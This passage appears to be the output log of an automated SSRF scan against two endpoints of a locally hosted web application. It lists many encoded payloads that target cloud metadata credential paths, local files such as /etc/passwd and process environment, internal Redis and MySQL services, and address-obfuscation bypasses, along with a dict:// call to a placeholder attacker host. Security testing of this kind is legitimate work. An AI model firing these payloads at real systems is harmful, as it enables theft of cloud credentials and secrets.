`http://localhost:4200/api/csv?url=%5B%3A%3A%5D%3A22` +- Testing: `http://localhost:4200/api/csv?url=%5B%3A%3A%5D%3A25` +- Testing: `http://localhost:4200/api/csv?url=%5B%3A%3A%5D%3A3128` +- Testing: `http://localhost:4200/api/csv?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/csv?url=%5B%3A%3A%5D%3A3389` +- Testing: `http://localhost:4200/api/csv?url=%5B%3A%3A%5D%3A8000` +- Testing: `http://localhost:4200/api/csv?url=%5B%3A%3A%5D%3A8001` +- Testing: `http://localhost:4200/api/csv?url=%5B%3A%3A%5D%3A8444` +- Testing: `http://localhost:4200/api/csv?url=%5B%3A%3A%5D%3A9901` +- Testing: `http://localhost:4200/api/csv?url=app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/csv?url=customer2-app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/csv?url=instance-data` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A22` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A443` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A80` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A3389` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A8000` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A8001` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A8444` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A9901` +- Testing: `http://localhost:4200/api/csv?url=localhost.localdomain` +- Testing: `http://localhost:4200/api/csv?url=loopback` +- Testing: `http://localhost:4200/api/csv?url=loopback%3A22` +- Testing: `http://localhost:4200/api/csv?url=loopback%3A80` +- Testing: `http://localhost:4200/api/csv?url=loopback%3A443` +- Testing: `http://localhost:4200/api/csv?url=loopback%3A3389` +- Testing: `http://localhost:4200/api/csv?url=loopback%3A8000` +- Testing: `http://localhost:4200/api/csv?url=loopback%3A9901` +- Testing: `http://localhost:4200/api/csv?url=loopback%3A8001` +- Testing: `http://localhost:4200/api/csv?url=loopback%3A8444` +- Testing: `http://localhost:4200/api/csv?url=ipcop.localdomain%3A8443` +- Testing: `http://localhost:4200/api/csv?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/csv?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fhostname` +- Testing: `http://localhost:4200/api/csv?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fid` +- Testing: `http://localhost:4200/api/csv?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Fproject%2Fproject-id` +- Testing: `http://localhost:4200/api/csv?url=metadata.nicob.net` +- Testing: `http://localhost:4200/api/csv?url=owasp.org.169.254.169.254.nip.io` +- Testing: `http://localhost:4200/api/csv?url=ssrf-169.254.169.254.localdomain.pw` +- Testing: `http://localhost:4200/api/csv?url=ssrf-cloud.localdomain.pw` +- Testing: `http://localhost:4200/api/csv?url=www.owasp.org.1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/csv?url=127.1%3A80` +- Testing: `http://localhost:4200/api/csv?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/csv?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/csv?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/csv?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/csv?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/csv?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/csv?url=2130706433%2F` +- Testing: `http://localhost:4200/api/csv?url=3232235521%2F` +- Testing: `http://localhost:4200/api/csv?url=3232235777%2F` +- Testing: `http://localhost:4200/api/csv?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/csv?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/csv?url=%7Bdomain%7D%40127.0.0.1` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/csv?url=%7Bdomain%7D.127.0.0.1` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/csv?url=%7Bdomain%7D%40localhost` +- Testing: `http://localhost:4200/api/csv?url=localhost%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/csv?url=%7Bdomain%7D.localhost` +- Testing: `http://localhost:4200/api/csv?url=localhost%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/csv?url=localhost%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%2500%7Bdomain%7D` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%3F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%2F%2F%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%2F%2F%2F%7Bdomain%7Dst%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/csv?url=st%3A00011211aaaa` +- Testing: `http://localhost:4200/api/csv?url=0%2F` +- Testing: `http://localhost:4200/api/csv?url=1.1.1.1%20%26%402.2.2.2%23%20%403.3.3.3%2F` +- Testing: `http://localhost:4200/api/csv?url=127.1.1.1%3A80%5C%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/csv?url=127.1.1.1%3A80%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/csv?url=127.1.1.1%3A80%3A%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/csv?url=127.1.1.1%3A80%23%5C%5C%40127.2.2.2%3A80%2F` +## Testing endpoint: http://localhost:4200/api/projects +- Testing: `http://localhost:4200/api/projects?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/projects?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A8080%2Fadmin` +- Testing: `http://localhost:4200/api/projects?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/projects?url=file%3A%2F%2F%2Fproc%2Fself%2Fenviron` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A3000%2Fadmin` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%3A3000%2Fconfig` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A3000%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A3000%2Frails%2Finfo` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A3000%2Flogs` +- Testing: `http://localhost:4200/api/projects?url=mysql%3A%2F%2F127.0.0.1%3A3306%2F` +- Testing: `http://localhost:4200/api/projects?url=mysql%3A%2F%2Flocalhost%3A3306%2F` +- Testing: `http://localhost:4200/api/projects?url=redis%3A%2F%2F127.0.0.1%3A6379%2F` +- Testing: `http://localhost:4200/api/projects?url=redis%3A%2F%2Flocalhost%3A6379%2F` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%3A9876%2F` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%3A54247%2F` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%3A59465%2F` +- Testing: `http://localhost:4200/api/projects?url=file%3A%2F%2F%2Fvar%2Flog%2Fnginx%2Faccess.log` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A4200%2F.git%2Fconfig` +- Testing: `http://localhost:4200/api/projects?url=169.254.169.254%2Fmetadata%2Finstance` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A4200%2Fapi%2Fdocs%2F` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A4200%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A4200%2Fapi%2Flogs` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A4200%2Fapi%2Fconfig` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A4200%2Fapi%2Fauth_test` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A4200%2Fapi%2Foverseer_images` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A4200%2Fapi%2Fcampuses` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A4200%2Fapi%2Fcsv` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A4200%2Fapi%2Fprojects` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A4200%2Fapi%2Fsettings` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A4200%2Fapi%2Fstudents` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A4200%2Fapi%2Fsubmission` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A4200%2Fapi%2Ftasks` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A4200%2Fapi%2Fteaching_periods` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A4200%2Fapi%2Ftii_actions` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A4200%2Fapi%2Ftii_eula` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A4200%2Fapi%2Ftii_hook` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A4200%2Fapi%2Ftutorials` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A4200%2Fapi%2Funit_roles` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A4200%2Fapi%2Funits` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A4200%2Fapi%2Fusers` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A4200%2F.env` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A4200%2F.git` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/projects?url=127.1%3A80` +- Testing: `http://localhost:4200/api/projects?url=0` +- Testing: `http://localhost:4200/api/projects?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A80` +- Testing: `http://localhost:4200/api/projects?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/projects?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/projects?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/projects?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/projects?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/projects?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/projects?url=127.127.127.127` +- Testing: `http://localhost:4200/api/projects?url=127.0.1.3` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.0` +- Testing: `http://localhost:4200/api/projects?url=2130706433` +- Testing: `http://localhost:4200/api/projects?url=017700000001` +- Testing: `http://localhost:4200/api/projects?url=0x7f000001` +- Testing: `http://localhost:4200/api/projects?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/projects?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/projects?url=` +- Testing: `http://localhost:4200/api/projects?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/projects?url=` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/projects?url=` +- Testing: `http://localhost:4200/api/projects?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/projects?url=` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/projects?url=` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/projects?url=google.com%40localhost` +- Testing: `http://localhost:4200/api/projects?url=localhost%23google.com` +- Testing: `http://localhost:4200/api/projects?url=google.com.localhost` +- Testing: `http://localhost:4200/api/projects?url=localhost%2Fgoogle.com` +- Testing: `http://localhost:4200/api/projects?url=localhost%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/projects?url=` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/projects?url=` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/projects?url=` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/projects?url=localtest.me` +- Testing: `http://localhost:4200/api/projects?url=http%3A%400%2F` +- Testing: `http://localhost:4200/api/projects?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/projects?url=127%E3%80%820%E3%80%820%E3%80%821` +- Testing: `http://localhost:4200/api/projects?url=127%25E3%2580%25820%25E3%2580%25820%25E3%2580%25821` +- Testing: `http://localhost:4200/api/projects?url=2130706433%2F` +- Testing: `http://localhost:4200/api/projects?url=3232235521%2F` +- Testing: `http://localhost:4200/api/projects?url=3232235777%2F` +- Testing: `http://localhost:4200/api/projects?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/projects?url=00000177.00000000.00000000.00000001` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1` +- Testing: `http://localhost:4200/api/projects?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/projects?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/projects?url=0x7f.0x00.0x00.0x01` +- Testing: `http://localhost:4200/api/projects?url=0x0000007f.0x00000000.0x00000000.0x00000001` +- Testing: `http://localhost:4200/api/projects?url=127.000000000000.1` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A00011211aaaa` +- Testing: `http://localhost:4200/api/projects?url=0%2F` +- Testing: `http://localhost:4200/api/projects?url=127.1` +- Testing: `http://localhost:4200/api/projects?url=127.0.1` +- Testing: `http://localhost:4200/api/projects?url=localtest.me` +- Testing: `http://localhost:4200/api/projects?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/projects?url=mail.ebc.apple.com` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/projects?url=www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us` +- Testing: `http://localhost:4200/api/projects?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/projects?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/projects?url=1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/projects?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/projects?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/projects?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/projects?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/projects?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/projects?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/projects?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/projects?url=127.0.1.3` +- Testing: `http://localhost:4200/api/projects?url=0` +- Testing: `http://localhost:4200/api/projects?url=127.1` +- Testing: `http://localhost:4200/api/projects?url=127.0.1` +- Testing: `http://localhost:4200/api/projects?url=localhost` +- Testing: `http://localhost:4200/api/projects?url=1.0.0.127.in-addr.arpa` +- Testing: `http://localhost:4200/api/projects?url=01111111000000000000000000000001` +- Testing: `http://localhost:4200/api/projects?url=0x7f.0x0.0x0.0x1` +- Testing: `http://localhost:4200/api/projects?url=0177.0.0.01` +- Testing: `http://localhost:4200/api/projects?url=7F000001` +- Testing: `http://localhost:4200/api/projects?url=2130706433` +- Testing: `http://localhost:4200/api/projects?url=6425673729` +- Testing: `http://localhost:4200/api/projects?url=127001` +- Testing: `http://localhost:4200/api/projects?url=127_0._0_1` +- Testing: `http://localhost:4200/api/projects?url=0000%3A%3A1` +- Testing: `http://localhost:4200/api/projects?url=0000%3A%3A1%3A80` +- Testing: `http://localhost:4200/api/projects?url=%3A%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/projects?url=0000%3A0000%3A0000%3A0000%3A0000%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/projects?url=localtest.me` +- Testing: `http://localhost:4200/api/projects?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/projects?url=127.127.127.127` +- Testing: `http://localhost:4200/api/projects?url=0177.0.0.1` +- Testing: `http://localhost:4200/api/projects?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/projects?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/projects?url=%E2%91%A1%E2%91%A7%E2%91%A4%E2%91%A1%E2%93%AA%E2%91%A2%E2%91%A8%E2%91%A0%E2%91%A5%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/projects?url=%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/projects?url=whitelisted%40127.0.0.1` +- Testing: `http://localhost:4200/api/projects?url=0x7f000001` +- Testing: `http://localhost:4200/api/projects?url=017700000001` +- Testing: `http://localhost:4200/api/projects?url=0177.00.00.01` +- Testing: `http://localhost:4200/api/projects?url=0000.0000.0000.0000` +- Testing: `http://localhost:4200/api/projects?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/projects?url=0177.0001.0000..0001` +- Testing: `http://localhost:4200/api/projects?url=0x7f.0x1.0x0.0x1` +- Testing: `http://localhost:4200/api/projects?url=0x7f.0x1.0x1` +- Testing: `http://localhost:4200/api/projects?url=ht%EF%BF%BD%EF%B8%8Ftp%3A%2F%2F12%EF%BF%BD7.0.0.1` +- Testing: `http://localhost:4200/api/projects?url=loopback%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/projects?url=loopback%3A00011211aaaa` +- Testing: `http://localhost:4200/api/projects?url=%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3` +- Testing: `http://localhost:4200/api/projects?url=169.254.169.254` +- Testing: `http://localhost:4200/api/projects?url=2852039166` +- Testing: `http://localhost:4200/api/projects?url=7147006462` +- Testing: `http://localhost:4200/api/projects?url=0xa9.0xfe.0xa9.0xfe` +- Testing: `http://localhost:4200/api/projects?url=0251.0376.0251.0376` +- Testing: `http://localhost:4200/api/projects?url=169%E3%80%82254%E3%80%82169%E3%80%82254` +- Testing: `http://localhost:4200/api/projects?url=169%EF%BD%A1254%EF%BD%A1169%EF%BD%A1254` +- Testing: `http://localhost:4200/api/projects?url=%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%EF%BD%A1%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%3A80` +- Testing: `http://localhost:4200/api/projects?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/projects?url=%5B%3A%3A%E2%91%A0%E2%91%A5%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%EF%BD%A1%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/projects?url=%5B%3A%3A%E2%93%95%E2%93%95%E2%93%95%E2%93%95%3A%E2%91%A0%E2%91%A5%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/projects?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/projects?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/projects?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/projects?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/projects?url=dict%3A%2F%2Fattacker%3A11111` +- Testing: `http://localhost:4200/api/projects?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/projects?url=file%3A%2F%2F%5C%2F%5C%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/projects?url=file%3A%2F%2Fpath%2Fto%2Ffile` +- Testing: `http://localhost:4200/api/projects?url=gopher%3A%2F%2Fmetadata.google.internal%3A80%2FxGET%2520%2FcomputeMetadata%2Fv1%2Finstance%2Fattributes%2Fssh-keys%2520HTTP%252f%2531%252e%2531%250AHost%3A%2520metadata.google.internal%250AAccept%3A%2520%252a%252f%252a%250aMetadata-Flavor%3A%2520Google%250d%250a` +- Testing: `http://localhost:4200/api/projects?url=gopher%3A%2F%2Fnozaki.io%2F_SSRF%250ATest!` +- Testing: `http://localhost:4200/api/projects?url=0.0.0.0%3A22` +- Testing: `http://localhost:4200/api/projects?url=0.0.0.0%3A443` +- Testing: `http://localhost:4200/api/projects?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/projects?url=0.0.0.0%3A3389` +- Testing: `http://localhost:4200/api/projects?url=0000%3A%3A1%3A22` +- Testing: `http://localhost:4200/api/projects?url=0000%3A%3A1%3A25` +- Testing: `http://localhost:4200/api/projects?url=0000%3A%3A1%3A3128` +- Testing: `http://localhost:4200/api/projects?url=0000%3A%3A1%3A3389` +- Testing: `http://localhost:4200/api/projects?url=0251.00376.000251.0000376` +- Testing: `http://localhost:4200/api/projects?url=0x41414141A9FEA9FE` +- Testing: `http://localhost:4200/api/projects?url=0xA9.0xFE.0xA9.0xFE` +- Testing: `http://localhost:4200/api/projects?url=0xA9FEA9FE` +- Testing: `http://localhost:4200/api/projects?url=0xa9fea9fe` +- Testing: `http://localhost:4200/api/projects?url=100.100.100.200%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/projects?url=100.100.100.200%2Flatest%2Fmeta-data%2Fimage-id` +- Testing: `http://localhost:4200/api/projects?url=100.100.100.200%2Flatest%2Fmeta-data%2Finstance-id` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.0` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%3A2379%2Fversion` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%3A3389` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%3A8000` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%3A9901` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%3A8001` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%3A8444` +- Testing: `http://localhost:4200/api/projects?url=127.1.1.1` +- Testing: `http://localhost:4200/api/projects?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/projects?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/projects?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/projects?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/projects?url=127.127.127.127.nip.io` +- Testing: `http://localhost:4200/api/projects?url=169.254.169.254.xip.io` +- Testing: `http://localhost:4200/api/projects?url=169.254.169.254%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/projects?url=169.254.169.254%2Flatest%2Fdynamic%2Finstance-identity%2Fdocument` +- Testing: `http://localhost:4200/api/projects?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/projects?url=169.254.169.254%2Flatest%2Fmeta-data%2Fami-id` +- Testing: `http://localhost:4200/api/projects?url=169.254.169.254%2Flatest%2Fmeta-data%2Fhostname` +- Testing: `http://localhost:4200/api/projects?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/projects?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2FPhotonInstance` +- Testing: `http://localhost:4200/api/projects?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fdummy` +- Testing: `http://localhost:4200/api/projects?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fs3access` +- Testing: `http://localhost:4200/api/projects?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F` +- Testing: `http://localhost:4200/api/projects?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F0%2Fopenssh-key` +- Testing: `http://localhost:4200/api/projects?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F%5BID%5D%2Fopenssh-key` +- Testing: `http://localhost:4200/api/projects?url=169.254.169.254%2Flatest%2Fmeta-data%2Freservation-id` +- Testing: `http://localhost:4200/api/projects?url=169.254.169.254%2Flatest%2Fuser-data` +- Testing: `http://localhost:4200/api/projects?url=169.254.169.254%2Flatest%2Fuser-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/projects?url=192.0.0.192%2Flatest%2F` +- Testing: `http://localhost:4200/api/projects?url=192.0.0.192%2Flatest%2Fattributes%2F` +- Testing: `http://localhost:4200/api/projects?url=192.0.0.192%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/projects?url=192.0.0.192%2Flatest%2Fuser-data%2F` +- Testing: `http://localhost:4200/api/projects?url=3232235521` +- Testing: `http://localhost:4200/api/projects?url=3232235777` +- Testing: `http://localhost:4200/api/projects?url=425.510.425.510` +- Testing: `http://localhost:4200/api/projects?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D` +- Testing: `http://localhost:4200/api/projects?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8000` +- Testing: `http://localhost:4200/api/projects?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8001` +- Testing: `http://localhost:4200/api/projects?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8444` +- Testing: `http://localhost:4200/api/projects?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A9901` +- Testing: `http://localhost:4200/api/projects?url=%5B%3A%3A%5D` +- Testing: `http://localhost:4200/api/projects?url=%5B%3A%3A%5D%3A22` +- Testing: `http://localhost:4200/api/projects?url=%5B%3A%3A%5D%3A25` +- Testing: 